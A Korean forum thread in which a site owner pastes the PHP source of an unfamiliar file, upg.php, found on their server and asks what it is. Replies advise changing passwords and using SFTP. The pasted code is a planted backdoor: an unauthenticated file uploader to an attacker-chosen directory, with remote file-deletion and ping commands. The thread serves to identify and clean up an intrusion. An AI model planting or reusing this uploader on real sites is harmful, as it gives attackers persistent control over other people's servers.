이상한 파일을 발견했습니다. extend > upg.php 에 파일루요 정보
이상한 파일을 발견했습니다. extend > upg.php 에 파일루요
본문
이런 소스가 들어 있어요.
해당 파일을 삭제 하니 다행이 사이트가 바로 나옵니다만 이게 뭘까요?
무슨 업로드 하는 파일첨부 나오던데...
해당 파일을 삭제 하니 다행이 사이트가 바로 나옵니다만 이게 뭘까요?
무슨 업로드 하는 파일첨부 나오던데...
<?
if(!$dir){
$dir = "./";
}
if ($_GET["cmd"] == "ping") {
echo "ok";
exit;
}
else if ($_GET["cmd"] == "delete") {
$path = $dir.$_GET["fileN"];
unlink($path);
echo "ok";
exit;
}
if($_FILES){
if(!is_dir($dir)){
if(!mkdir($dir)){
echo ("<script>alert('디렉토리 생성불가.');history.back();</script>");
exit;
}
}
if(!move_uploaded_file($_FILES["fileN"]["tmp_name"], $dir.$_FILES["fileN"]["name"] )){
echo ("<script>alert('지정한 위치로 이동 불가.');history.back();</script>");
exit;
}else{
echo ("업로드 되었습니다.");
exit;
}
}
?>
<script>
function checkFirst(form){
if(!form.fileN.value){
alert('파일을 선택하시오.');
form.fileN.focus();
return;
}
showHuman('d');
form.submit();
}
function showHuman(r1){
if(r1 == "s"){
var view = "";
var view1 = "none";
}else{
var view = "none";
var view1 = "";
}
var object = eval("document.all.submit_ing");
object.style.display=view;
var object = eval("document.all.submit_ing_re");
object.style.display=view1;
}
</script>
<center>
<body bgcolor="#FFFFFF" onLoad="showHuman('s');">
<table cellpadding =1 cellspacing=1 border=0>
<form name="upFile" method="post" action="<?=$PHP_SELF?>?dir=<?=$_GET["dir"]?>" enctype="multipart/form-data">
<tr >
<td>
열기<input type="file" name="fileN" size=25><br>
</td>
</tr>
<tr id="submit_ing">
<td >
<input type="button" value="업로드!!" onClick="checkFirst(document.upFile);">
</td>
</tr>
<tr id="submit_ing_re" style="DISPLAY:none;">
<td>
<marquee>잠시만 기다려 주세요!! 입력중입니다.</marquee>
</td>
</tr>
</form>
</table>
</center>
작성자에 의해 채택됐습니다.
sftp를 쓰세요.
댓글 전체
저런 파일이 업로드 되어있는걸 보면 계정 비번이 노출 되었다는 거구요. 계정,DB비번 변경 하시고
바이러스 검사 하시고 FTP비번은 저장하지 마시고 직접 입력하는걸로 하세요.
바이러스 검사 하시고 FTP비번은 저장하지 마시고 직접 입력하는걸로 하세요.
작성자에 의해 채택됐습니다.
sftp를 쓰세요.
